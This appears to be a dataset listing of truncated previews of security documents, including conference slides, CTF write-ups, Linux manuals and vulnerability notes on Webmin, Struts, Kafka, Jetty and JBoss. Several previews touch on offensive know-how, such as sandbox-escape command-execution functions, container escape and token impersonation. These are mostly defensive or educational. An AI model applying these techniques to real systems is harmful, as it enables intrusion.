text
stringlengths
100
9.93M
category
stringclasses
11 values
兵家必爭之地 Nanika PDF created with pdfFactory Pro trial version www.pdffactory.com • 在防毒與惡意軟體間的一往一來就是一場 激烈的戰爭 • 在一黑一白對抗之中各有輸贏 PDF created with pdfFactory Pro trial version www.pdffactory.com • 安全需要對於任何風險都略懂 • 知彼知己,百戰不殆;不知彼而知己,一 勝一負;不知彼,不知己,每戰必殆 • 知識就是力量 PDF created with pdfFactory Pro trial version www.pdffactory.com 你懂入侵 ...
pdf
R I C K Y H I L L D E F C O N 2 1 8 / 3 / 2 0 1 3 Phantom Network Surveillance UAV / Drone 1 About Me  Security Consultant, D.C. Area  Specialties: Wireless & SCADA Security  US Govt. & Commercial  Previous DEFCON Talks: WarRocketing & WarBallooning, (over Las Vegas ;-)  Hobbies: R/C heli’s,...
pdf
由電腦鑑識看帳號 由電腦鑑識看帳號/密碼的竊取 密碼的竊取 2009/July 2009/July 講師 講師:鑒真數位 鑒真數位 黃敬博 黃敬博 po@iforensics.com.tw po@iforensics.com.tw (EnCE/CCE/CIFI/CHFI/CEH/CISSP) (EnCE/CCE/CIFI/CHFI/CEH/CISSP) PDF created with pdfFactory Pro trial version www.pdffactory.com 簡報大網 簡報大網 帳號密碼遭竊的嚴重性 不可知的殘留 帳號/密碼存在的位置及方式 破密的邏輯 常用的竊取手法 問題與討論 PDF created wit...
pdf
1 js加密爆破⼩技巧 js格式化,然后下断点 source⾥下断点,找到加密算法位置,通过console批量加密 2 弄这个加上明⽂,⽅便搜索。 sublime批量格式化密码 JavaScript 复制代码 let pwds = ["123456", "111111"]; for (let pwd of pwds) {  let encrypt = o.encrypt(i.MD5(pwd).toString());  console.log("pwd: %s;encrypt text: $$encrypt$$%s$$encrypt$$; ", pwd, encrypt); }; 1 2 3 4 5 6 3 Java...
pdf
MI-CASA SU-CASA Elliott Thompson Principle Consultant | OSCP | CTL | CCT-APP 192.168.1.1 192.168.1.1 ?? CACHE-CONTROL: MAX-AGE= 31536000 C KIES BROWSER Close the browser & all profiles Close the browser Close the browser Close the browser Close the tab Appears to ignore the flag Expires = “Session” JAVASCRIPT CA...
pdf
OTP circumventing in MIFARE ULTRALIGHT: Who says free rides? bughardy bughardy@cryptolab.net Eagle1753 eagle1753@onenetbeyond.org Introduction RFID technologies are becoming more and more prevalent in our lives. This motivated us to study them, and in particular to study the MIFARE ULTRALIGHT chips, which are widel...
pdf
安全服务解读 by yuhao 安全服务从业⼈员占⽐在整个⾏业的占⽐越来越⼤,其中很多未来或许会成为甲⽅的安全信息化⼈员、 安全研究⼈员、红蓝对抗⼈员、代码审计的⼈员、CTF研究员。 本⽂解决的主要⽬的是:很多在步⼊⼯作的第⼀份work就是⼀名普通的安全服务⼈员如何了解⾏业,如 果成为已经是⼀名安全服务从业者,如何提⾼⾃我价值。所以有必要可以讲解⼀下什么是安全服务,不 要成为单⼀低廉的重复⼯作劳动⼒。 安全服务整体架构 安全服务在现在的⽹络环境下,所带来的价值和其⼯作前景如何,我将安全服务分为以下⼏种类型,然 后按照其中的⼯作内容,对其所必备技能和带来价值进⾏⼀定的解读 通过⼀个简单的分类,我们可以知道安全服务的⼤致⼯作,接下来我们...
pdf
Security is a Neverending Story CEO Luta Security Inc @lutasecurity @k8em0 Katie Moussouris We’re Going to Need More than Luck Who the FSCK Are You? What is it you do here? • Founder & CEO Luta Security • Former Microsoft Security Strategist • Former Hacker for Hire • ISO Standards Editor • New America...
pdf
Security in Cognitive Radio Networks Hunter Scott Latest version of these slides: defcon21.hscott.net + v RF Engineering 101 TV Whitespace Let's break it. Change (or appear to change) the spectrum to force certain decisions Selfish Attack DOS Secondary User Emulation v Primary User Emulation v v Misbehave Attack v ...
pdf
Developments in Cisco IOS Forensics Felix ‘FX’ Lindner DEFCON Las Vegas, August 2008 Agenda IP Routing Infrastructure and Cisco IOS Cisco IOS Internals Debugging and Post Mortem Analysis Today A New Analysis Approach Proposal Features Challenges Public Offer Future Work IP Routing Infrastructure The Internet...
pdf
Today‘s Session ! Design failures in embedded systems ! Examples of design failures ! Exploiting a design failure ! Software vulnerabilities in embedded systems ! Examples software vulnerabilities ! Exploiting a common embedded system Design failures ! Undocumented functionality ! Developer backdoors ! Auto-something ...
pdf
HP Security Research Zero Day Initiative Java Every-Days Exploiting Software Running on 3 Billion Devices Brian Gorenc Manager, Vulnerability Research Jasiel Spelman Security Researcher HP’s Zero Day Initiative would like to thank the following researchers for their submissions over the last three years: A...
pdf
A CTF-Style Escape Journey on VMware Workstation f1yyy@Chaitin.Tech About us ● Beijing Chaitin Tech Co., Ltd(@ChaitinTech) ○ https://chaitin.cn/en ○ https://realworldctf.com/ ● Chaitin Security Research Lab ○ Pwn2Own 2017 3rd place ○ GeekPwn 2015/2016/2018/2019 awardees ■ PS4 Jailbreak, Android rooting, IoT Offensive ...
pdf
Not So Super Notes How Well Does US Dollar Note Security Prevent Counterfeiting? Who? ● Member of Technical Staff for VMware ● Bachelors and Masters degree in Computer Science ● Software engineer for almost 10 years ● Love thinking about the limits of systems ● Amateur lock-picker ● Amateur beer brewer What? ● The secu...
pdf
;LOGIN: JUNE 2006 SCRIPT KIDDIES WITH BRIEFCASES 51 A L E X A N D E R M U E N T Z script kiddies with briefcases T H E L E G A L S Y S T E M A S T H R E AT Alexander Muentz is both a sysadmin (since 1999) and a lawyer (admitted to the bar in Pennsylvania and New Jersey). He’d love to be a hacker public defender but has...
pdf
About your JOB Ethen @ TDOH Security Consultant Defense / Forensic / Analysis Full-stack SOC Engineer Developer Free and Open ethen@tdohacker.org XXX “” “” • • • • Penetration Test SOC SOC Security Operation Center / / 2016/06/26 ... …… TDOH https://goo.gl/jaVUtO https://goo.gl/RqN9y1 http://tdohac...
pdf
Stitching numbers Alex Moneger Security Engineer 10th of August 2014 Generating ROP payloads from in memory numbers Cisco Con!dential 2 © 2013-2014 Cisco and/or its a"liates. All rights reserved. !  Work for Cisco Systems !  Now a developer in the Cloud Web Security Business Unit (big cloud based security pr...
pdf
網路入侵攻擊實錄 中小馬、被掛馬、潘朵拉 no-name 大綱 • 瀏覽網站中小馬---使用者 • 網站被掛馬畫面(未公布資訊) • 中木馬- 天知 地知 就是我不知 • 看網站有那麼嚴重嗎?(Blog_Clickjacking&影音網馬) • 網站入侵掛馬實錄---伺服器 • 網站洩露多少重要資訊! • 使用開發套件網站安全嗎? • 網站入侵實戰!(入侵網站後台系統) • 躲在後面的神密客 ---駭客Botnet • Botnet 掛馬跳板主機 • 入侵Botnet主機(Botnet主機入侵過程手法) • 打開潘朵拉的盒子(Botnet主機資訊) 使用者 個資 網站 伺服器 Botnet 駭客 No-name 被植入後門程 式側錄...
pdf
# flag 包 --- **Source & Reference** - [Go语言flag包:命令行参数解析](http://c.biancheng.net/view/5573.html) --- 几个概念: - 命令行参数(或参数):是指运行程序提供的参数 - 已定义命令行参数:是指程序中通过 flag.Xxx 等这种形式定义了的参数 - 非 flag(non-flag)命令行参数(或保留的命令行参数):先可以简单理解为 flag 包不能解析的参数 ```go package main import ( "flag" "fmt" "os" ) var ( h, H bool v bool...
sec-knowleage
## 5. 生成器(Builder) ### Intent 封装一个对象的构造过程,并允许按步骤构造。 ### Class Diagram <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/db5e376d-0b3e-490e-a43a-3231914b6668.png"/> </div><br> ### Implementation 以下是一个简易的 StringBuilder 实现,参考了 JDK 1.8 源码。 ```java public class AbstractStringBuilder { ...
sec-knowleage
## Rsabin (crypro, 314p, 37 solves) > Classical things? > [rsabin-a51076632142e074947b08396bf35ab2.tgz](rsabin.tgz) ### PL [ENG](#eng-version) Z dołączonego do zadania pliku tgz wypakowujemy dwa kolejne - [rsabin.py](rsabin.py) (kod szyfrujący coś) oraz [cipher.txt](cipher.txt) (wynik wykonania go). Kod szyfrujący wyg...
sec-knowleage
# Writeup InsomniHack CTF 2017 Team: msm, rev, shalom, akrasuski1, nazywam, c7f.m0d3, cr01283 ### Table of contents * [bender_safe](bender_safe) * [internet_of_fail](internet_of_fail) * [mindreader](mindreader) * [cryptoquizz](cryptoquizz) * [the_great_escape1](the_great_escape1) * [the_great_escape2](the_great_escape2...
sec-knowleage
# Jump Oriented Programming ## 原理 类似于 pwn 中的 ROP,EVM 中也有 JOP(Jump Oriented Programming)。JOP 的思想和 ROP 是相似的:串联起一个个小的代码片段(gadget),达成一定的目的。 涉及到JOP 的是如下三个字节码: - 0x56 JUMP - 0x57 JUMPI - 0x5B JUMPDEST 在 EVM 中的无条件跳转 `JUMP` 和条件跳转 `JUMPI` 的目的地都必须是 `JUMPDEST`,这点和 ROP 可以任选返回地址不同。 另外需要注意的是,EVM 虽然使用的是变长指令,但是不允许像 ROP 那样跳到一条指令的中间。比如 ...
sec-knowleage
# 静态分析综合题目 ## 2017 ISCC Crackone 利用 jadx 进行反编译,可以得到程序的基本逻辑如下 - 对用户输入的内容进行 base64 编码,然后在指定长度位置处插入`\r\n` ,这个似乎并没有什么乱用。 - 之后程序将编码后的内容传递给 so 中的 check 函数。这个函数的逻辑如下 ```c env = a1; len = plen; str = pstr; v7 = malloc(plen); ((*env)->GetByteArrayRegion)(env, str, 0, len, v7); v8 = malloc(len + 1); memset(v8, ...
sec-knowleage
# Trend Micro CTF 2018 Quals Team: nazywam, pwn.m0d3, shalom, sasza, akrasuski1, rodbert ### Table of contents * [Java pwn (misc)](misc_deserializer) * [Ocean of sockets (forensics)](for_ocean) * [Deep dive (forensics)](for_dive) * [Constellation (misc)](misc_constellation) * [RSA (crypto)](crypto_rsa) * [ACME (crypto)...
sec-knowleage
service === 控制系统服务的实用工具 ## 补充说明 **service命令** 是Redhat Linux兼容的发行版中用来控制系统服务的实用工具,它以启动、停止、重新启动和关闭系统服务,还可以显示所有系统服务的当前状态。 ### 语法 ```shell service(选项)(参数) ``` ### 选项 ```shell -h:显示帮助信息; --status-all:显示所服务的状态。 ``` ### 参数 * 服务名:自动要控制的服务名,即`/etc/init.d`目录下的脚本文件名; * 控制命令:系统服务脚本支持的控制命令。 ### 实例 当修改了主机名、ip地址等信息时,经常需要把网络重启使...
sec-knowleage
sshd === openssh软件套件中的服务器守护进程 ## 补充说明 **sshd命令** 是openssh软件套件中的服务器守护进程。 ### 语法 ```shell sshd(选项) ``` ### 选项 ```shell -4:强制使用IPv4地址; -6:强制使用IPv6地址; -D:以后台守护进程方式运行服务器; -d:调试模式; -e:将错误发送到标准错误设备,而不是将其发送到系统日志; -f:指定服务器的配置文件; -g:指定客户端登录时的过期时间,如果在此期限内,用户没有正确认证,则服务器断开次客户端的连接; -h:指定读取主机key文件; -i:ssh以inetd方式运行; -o:指定ssh的配置选项; ...
sec-knowleage
# TheTarget * Category: Misc. * 100 Points * Solved by the JCTF Team ## Description > EZ-PZ-LEMON-SQUIZZY A file was attached. ## Solution Let's check the attached file: ```console root@kali:/media/sf_CTFs/bsidestlv/TheTarget/TheTarget# file TheTarget TheTarget: Extensible storage engine DataBase, version 0x620, checks...
sec-knowleage
请添加自己的昵称或真实姓名到列表中,亦可附上联系方式: - Arlin - DeanGame - G-Food - JACK.L - Peter Pearce Lu - wuten - SuperSoccer - SunnyAndroid - Sunnyelf - Firefox2100 - y159357 - Loutine - JonnieWayy
sec-knowleage
# The Vault 2 Category: Pwn, 350 Points ## Description > nc challenges.ctfd.io 30441 ## Solution This is the follow-up challenge for [The Vault 1](The_Vault_1.md). Let's connect to the attached service: ```console root@kali:~# nc challenges.ctfd.io 30441 _____ _ __ __ _ _ ...
sec-knowleage
'\" '\" Copyright (c) 1997 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" RCS: @(#) $Id: resource.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros use...
sec-knowleage
# Episode 2: Challenge 3 ## Description > Welcome to the shell. See if you can leave. socat FILE:`tty`,raw,echo=0 TCP:quarantine-shell.h4ck.ctfcompetition.com:1337 > > Hint: How can you ask the shell for which commands are available? ## Solution Let's connect to the server: ```console ┌──(user@kali)-[/media/sf_CTFs/h...
sec-knowleage
#!/usr/bin/python3 import os, tempfile, subprocess try: data = input(">").strip() if len(data) > 12: raise Exception("too large") with tempfile.TemporaryDirectory() as dirname: name = os.path.join(dirname, "user") with open(name, "w") as f: f.write(data) os.chmod(name, 0o500) ...
sec-knowleage
# Struts2 S2-061 Remote Code Execution Vulnerablity (CVE-2020-17530) [中文版本(Chinese version)](README.zh-cn.md) In the versions prior to Struts 2.5.25, when evaluated on raw user input in tag attributes, may lead to remote code execution. This vulnerability is the bypass of the OGNL sandbox, which enhance after S2-059...
sec-knowleage
# Heap Flags ## 关于Heap flags `Heap flags`包含有两个与`NtGlobalFlag`一起初始化的标志: `Flags`和`ForceFlags`. 这两个字段的值不仅会受调试器的影响, 还会由windows版本而不同, 字段的位置也取决于windows的版本. * Flags字段: * 在32位Windows NT, Windows 2000和Windows XP中, `Flags`位于堆的`0x0C`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x40`偏移处. * 在64位Windows XP中, `Flags`字段位于堆的`0x14`偏移处, ...
sec-knowleage
# Binary Gauntlet 1 Category: Binary Exploitation, 30 points ## Description > Okay, time for a challenge. A binary file was attached. ## Solution This is the follow-up for [Binary Gauntlet 0](Binary_Gauntlet_0.md). Let's run `checksec` on the file: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/Binary_Gauntlet_1] └─$ c...
sec-knowleage
--- title: Gmail date: 2022-11-23 16:23:31.699967 background: bg-[#d8503f] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 90 keyboard shortcuts found on Gmail --- Keyboard Shortcuts ------------------ ### Compose and Chat Shortcut | Action ---|--- `P` | Prev...
sec-knowleage
### ELF 文件概述 > 本部分内容来源于 ELF 1.2 标准,内容经过一定的修改与整理,主要参考文献如下 > > 1. ELF 文件格式分析,北京大学,滕启明 > 2. ELF-摧毁圣诞 ### ELF 文件简介 ELF (Executable and Linkable Format)文件,也就是在 Linux 中的目标文件,主要有以下三种类型 - 可重定位文件(Relocatable File),包含由编译器生成的代码以及数据。链接器会将它与其它目标文件链接起来从而创建可执行文件或者共享目标文件。在 Linux 系统中,这种文件的后缀一般为 `.o` 。 - 可执行文件(Executable File),就是我们通常在 L...
sec-knowleage
**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。 痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。 ### Odbcconf简介: ODBCCONF.exe是一个命令行工具,允许配置ODBC驱动程序和数据源。 微软官方文档: https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017 说明:Odbcconf.exe所在路径已被系统添加PATH环境变量中,因此,Odbcconf命令可识别,需注意x86,x64位的Odbcconf调用。 Windows 2003 默认位置: ```bash C:\WINDOW...
sec-knowleage
# OldPC (misc, 478 points, 14 solves) In the task we get [machine code dump](oldpc.hex). A bit of googling for byte sequencec got us to http://www.xgc-tek.com/manuals/erc32-ada-gs/x286.html where we could see assembly listing with similar machine code to what we had (at least the stack frame creation and ret/leave). No...
sec-knowleage
# ICS_CTF 发现 > 本栏目内容,ICS CTF竞赛内容来自于作者自身打比赛经验,如果不对之处,请各位老师批评指正 ## 工控设备发现 工控设备发现是工控比赛的前提,目前针对工控设备扫描中,在Nmap、Metasploit、Censes集成了大量的工具,用于挖掘当前在线PLC、DCS等ICS设备。 ## 工控扫描脚本 ### 基于工控端口的信息扫描脚本 在大量IP中如何发现工控设备,除了工控特殊端口意外,大量端口都是正常服务,例如ftp、ssh、telnet、smtp、ntp等正常网络服务。下面列表列举了当前可以利用开源工控扫描脚本。 |端口|协议/设备|来源| |:-----|:------|:------| |102(T...
sec-knowleage
# jsp --- ## 什么是 JavaServer Pages? JavaServer Pages(JSP) 是一种技术,能够开发支持动态内容的网页,可以帮助开发人员在 HTML 页面中利用特殊的 JSP 标签插入 Java 代码,其中大部分标签是以 `<%` 开始,以 `%>` 结束的。 JavaServer Pages 组件是 Java Servlet 的一种,旨在为 Java web 应用程序实现一个用户界面。Web 开发人员编写 JSP 作为文本文件,结合 HTML 或 XHTML 代码,XML 元素,并嵌入 JSP 操作和命令。 使用 JSP,你可以通过 web 页面的形式收集来自用户的输入,来自数据库或其他资源的当前...
sec-knowleage
# Webmin 远程命令执行漏洞(CVE-2019-15107) Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 参考链接: - https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://www.exploit-db.com/exploits/47230 - https://blog.firosolutions.com/exploits/webm...
sec-knowleage
.TH ROUTE 8 "2 January 2000" "net-tools" "Linux Programmer's Manual" .SH NAME .B route - 显示 / 操作IP选路表 .SH 总览 SYNOPSIS \fBroute\fR [-CFvnee] \fBroute\fR [-v] [-A family] add [-net|-host] target [netmask Nm] [gw Gw] [metric N] [mss M] [window W] [irtt I][reject] [mod] [dyn] [reinstate] [[dev] If] \fBroute\fR [-v] [...
sec-knowleage
# Python 沙盒 所谓的 Python 沙盒,即以一定的方法模拟 Python 终端,实现用户对 Python 的使用。 ## Python 沙箱逃逸的一些方法 我们通常所说的 Python 沙箱逃逸就是绕过模拟的 Python 终端,最终实现命令执行。 ### 导入模块 在 Python 的内建函数中,有一些函数可以帮助我们实现任意命令执行: ``` os.system() os.popen() commands.getstatusoutput() commands.getoutput() commands.getstatus() subprocess.call(command, shell=True) subprocess...
sec-knowleage
# assembly-0 Reversing, 150 points ## Description: > What does asm0(0xaa,0xf2) return? Submit the flag as a hexadecimal value (starting with '0x'). ```assembly .intel_syntax noprefix .bits 32 .global asm0 asm0: push ebp mov ebp,esp mov eax,DWORD PTR [ebp+0x8] mov ebx,DWORD PTR [ebp+0xc] mov eax,ebx mov esp,ebp ...
sec-knowleage
# T1583-002-购买基础设施-DNS服务 ## 来自ATT&CK的描述 攻击者可能会建立他们自己的域名系统(DNS)服务器,可以在攻击目标期间使用。在破坏后的活动中,攻击者可以利用DNS流量进行各种任务,包括指挥和控制(例如:应用层协议)。与其劫持现有的DNS服务器,攻击者可能会选择配置和使用自己的DNS服务器来支持渗透行动。 通过使用自己的DNS服务器,攻击者可以更好的控制和管理他们的服务器端的DNS C2流量。通过对DNS服务器的控制,攻击者可以配置DNS应用程序,为恶意软件提供有条件的响应,一般来说,在基于DNS的C2通道,在结构上有更大的灵活性。 ## 测试案例 ### DNS Tunneling DNS Tunne...
sec-knowleage
## Math aside, we're all black hats Now(trivia, 10p, 551 solves) `This Pentesting expert supplied HBO's Silicon Valley with technical advice in season 2. The flag is his twitter handle.` ### PL Version `for ENG version scroll down` Zadanie polegało na znalezieniu loginu na twitterze pentestera który pracował jako dorad...
sec-knowleage
# Time's Up, Again! Reverse Engineering, 450 points ## Description: > Previously you solved things fast. Now you've got to go faster. Much faster. Can you solve *this one* before time runs out? ## Solution: This is the follow-up for [Time's Up](Times_Up.md). Let's run the attached file: ```console root@kali:/media/sf...
sec-knowleage
# Race Condition ## 概述 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。这个术语最初来自于两个电信号互相竞争来影响输出结果。 条件竞争主要出现在如下领域 - 电子系统,尤其是逻辑电路 - 计算机,尤其是多线程程序和分布式程序。 由于目前的系统中大量采用并发编程,经常对资源进行共享,往往会产生条件竞争漏洞。 这里我们主要考虑计算机程序方面的条件竞争。当一个软件的运行结果依赖于进程或者线程的顺序时,就可能会出现条件竞争。简单考虑一下,可以知道条件竞争需要如下的**条件**: - 并发,即至少存在两个并发执行流。这里的执行流包括...
sec-knowleage
# 电报监控平台建设 ## 现有思路 ### 思路一 网页版登入,爬虫获取群组聊天内容 ### 思路二 使用Telegram Bot获取群组聊天内容,解决验证问题 ### 思路三 ✔ 借助Telegram API,[tdlib](https://core.telegram.org/tdlib),使用python收发信息,收到的信息格式化后用Flask Web呈现 > TDLib can be used from Python through the JSON interface. ### 思路四 ❌ 捕获网路数据包,解密HTTPS包,获取相关信息 > 为了使Wireshark解密数据包,它需要访问Telegram使用的加密密钥,而该...
sec-knowleage
--- title: 容器逃逸方法检测指北 --- <center><h1>容器逃逸方法检测指北</h1></center> --- ## 0x00 前言 最近发现有关容器逃逸的文章大多覆盖的方法不全,而且有些缺少相应的检测方法,导致 RT 在拿到一个容器权限时,比较难以判断这个容器存在哪些逃逸方法。 本文尽可能覆盖全容器逃逸检测的方法,并尽可能的给出在容器内部就能检测的方法,这样 RT 在容器内运行一下命令,根据返回的结果就能判断有没有这个漏洞了。 针对这些检测方法,我这边也写了相应的脚本,方便在容器内部一键检测,脚本放到文章底部了。 对于一些无法直接在容器内部检测到的逃逸方法,这里是不列举的,如果读者知道其他逃逸漏洞的检测方法,...
sec-knowleage
# pyc --- ## 编译成 pyc **cli** ``` python -m py_compile test.py ``` **代码** ```py import py_compile py_compile.compile("test.py") ``` --- ## pyc 反编译 - [python反编译](https://tool.lu/pyc)
sec-knowleage
'\" t .TH "SYSCTL\&.D" "5" "" "systemd 231" "sysctl.d" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.deb...
sec-knowleage
# Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。 在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性`sasl.jaas.config`的值为`com.sun.security.auth.module.JndiLoginModule`,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。 由于这个漏洞是存在于Java库kafka-clients中,所以我们需要在真实环境下找到使用了这个库的软...
sec-knowleage
import re from Crypto.Util.number import getPrime from crypto_commons.asymmetric.asymmetric import paillier_encrypt_simple, paillier_decrypt from crypto_commons.generic import long_to_bytes, bytes_to_long from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send from crypto_commons.rsa.rsa_common...
sec-knowleage
# Back to the basics, re, 293p >You won't find any assembly in this challenge, only C64 BASIC. Once you get the password, the flag is CTF{password}. P.S. The challenge has been tested on the VICE emulator. Running the attached file on the emulator greets us with password prompt, so we probably have to guess it. The bin...
sec-knowleage
--- title: 利用 IAM 进行权限维持 --- <center><h1>利用 IAM 进行权限维持</h1></center> --- 利用 IAM 进行权限维持的原理也比较简单,直接在 IAM 中创建一个拥有高权限的用户即可。 例如这里选择添加用户,访问类型选择控制台密码 </br><img width="800" src="/img/1651980416.png"></br> 「设置权限」选择「直接附加现有策略」,策略选择「AdministratorAccess」,即表示附加所有策略 </br><img width="800" src="/img/1651980443.png"></br> 创建完成后,会提供自动生成的...
sec-knowleage
.TH PSFADDTABLE 1 "28 Oct 1997" "控制台工具" "Linux 用户手册" .SH NAME psfaddtable \- 添加一个Unicode字符表到控制台字体中 .SH 总览 .B psfaddtable .I 字体文件 表文件 [输出文件] .SH 描述 .B Psfaddtable 命令融合了 .I 字体文件 提供的 .psf 格式的控制台字 体和 .I 表文件 提供的Unicode字符表, 生成一个带有嵌入字符表的 字体文件, 并将其写到 .I 输出文件 (如果该文件给出, 否则写到标 准输出). .I 字体文件 或者 .I 输出文件 都可以用单个的破折号(\-)取 代以从标准输入读入, ...
sec-knowleage
# Empire3 Web Exploitation, 500 points ## Description: > Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? ## Solution: This is the follow-up for [Empire2](Empire2.md). We'll use the same solution that worked for the previous challen...
sec-knowleage
# 性能监控 --- ## Actuator监控 ### Actuator 简介 在生产环境中,往往需要对系统实际运行的情况(例如 cpu、io、disk、db、业务功能等指标)进行监控运维。在 SpringBoot 项目中 Actuator 模块提供了众多 HTTP 接口端点(Endpoint),来提供应用程序运行时的内部状态信息。 Actuator 模块提供了一个监控和管理生产环境的模块,可以使用 http、jmx、ssh、telnet 等来管理和监控应用。包括应用的审计(Auditing)、健康(health)状态信息、数据采集(metrics gathering)统计等监控运维的功能。同时,提供了可以扩展 Actuator ...
sec-knowleage
# JBoss未授权访问漏洞 ## 漏洞描述 JBoss 是一个管理 EJB 的容器和服务器,支持 EJB 1.1、EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 [servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020)/JSP 的 WEB 容器,一般与 Tomcat 或 Jetty 绑定使用。JBoss 默认在 8080 端口监听。 在低版本的 JBoss 中,默认可以访问 JBoss Web 控制台(http://IP:8080/jmx-console),无需用户名和密码。通过 JBoss 未授权访问管理控制台的...
sec-knowleage
# T1049/1069-bloodhound使用 ## 来自ATT&CK的描述 T1049:攻击者可能会通过查询网络上的信息来尝试获取与他们当前正在访问的受感染系统之间或从远程系统获得的网络连接的列表。 T1069:攻击者可能会尝试查找本地系统或域级别的组和权限设置。 ## 测试案例 BloodHound是一种单页的JavaScript的Web应用程序,构建在Linkurious上,用Electron编译,NEO4J数据库是PowerShell/C# ingesto。 BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容。攻击者可以使用BloodHound轻松识别高度复杂的攻击路径,...
sec-knowleage
# 令牌伪造 令牌伪造这种技术可以用本地管理员的权限模拟登陆到其他计算机上,比如登陆到域管的机器上。 ## powershell 使用powershell的模块可以达到令牌伪造的目的,生成一个新进程作为你模拟的用户,但是可以在同一个线程内工作,所以,你输入`whoami`可能回显出的是原始用户名,但你仍然拥有目标用户的权限。 这个时候你迁移新的进程到这个进程,就拥有了目标用户的shell。 这个模块在powersploit中: ``` https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltr...
sec-knowleage
diff === 比较给定的两个文件的不同 ## 补充说明 **diff命令** 在最简单的情况下,比较给定的两个文件的不同。如果使用“-”代替“文件”参数,则要比较的内容将来自标准输入。diff命令是以逐行的方式,比较文本文件的异同处。如果该命令指定进行目录的比较,则将会比较该目录中具有相同文件名的文件,而不会对其子目录文件进行任何比较操作。 ### 语法 ```shell diff(选项)(参数) ``` ### 选项 ```shell -<行数>:指定要显示多少行的文本。此参数必须与-c或-u参数一并使用; -a或--text:diff预设只会逐行比较文本文件; -b或--ignore-space-change:不检查空格...
sec-knowleage
# 文件头 --- 文件的扩展名是用来识别文件类型的。通过给他指定扩展名,我们可以告诉自己,也告诉操作系统我们想用什么方式打开这个文件。比如我么会把 .jpg 的文件默认用图片显示软件打开,.zip 文件会默认用解压软件打开等等。 然而,扩展名完全是可以随便改改的。我们可以给文件设置一个任意的扩展名,当然也可以不设置扩展名。这样一来我们就不能了解到这个文件究竟是做什么的,究竟是个什么样的文件。我们或许也会疑惑,为什么一个软件,比如视频播放器,就能用正确的方式打开.mp4 .rmvb .wmv 等等的视频? 事实上,所有的文件都是以二进制的形式进行存储的,本质上没有差别。之所以使用的方法不同,只是因为我们理解他的方式不同。在每一个文件...
sec-knowleage
# Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-34429) Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。 Jetty在9.4.40后修复了因为`%2e`导致的敏感信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164),但这个修复是不完全的,通过下面三种方式可以进行绕过: - unicode形式URL编码:`/%u002e/WEB-INF/web.xml` - `\0`组合`.`导致的绕过:`/.%00/WEB-INF/web.x...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH TRUNCATE 1 2022年9月 "GNU coreutils...
sec-knowleage
### PWN关于Change Self概述 内核会通过进程的 `task_struct` 结构体中的 cred 指针来索引 cred 结构体,然后根据 cred 的内容来判断一个进程拥有的权限,如果 cred 结构体成员中的 uid-fsgid 都为 0,那一般就会认为进程具有 root 权限。 ```c struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define...
sec-knowleage
# ACID: RELOADED > https://download.vulnhub.com/acid/Acid-Reloaded.7z 靶场IP:`192.168.32.206` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.206 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 01:40 EDT Nmap scan report for 192.168.32.206 Host is up (0.0013s latency). Not shown: 65533 close...
sec-knowleage
# Android安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **案例** - [Attacking the attackers Hacking like it's 1999](https://asaf.me/2018/07/23/attacking-the-attackers/) - [如何攻击智能汽车远程启动系统(Part 1)](https://www.anquanke.com/post/id/153373) - [对恶意Android应用Bangle Android App Packer的分析](http://www.fre...
sec-knowleage
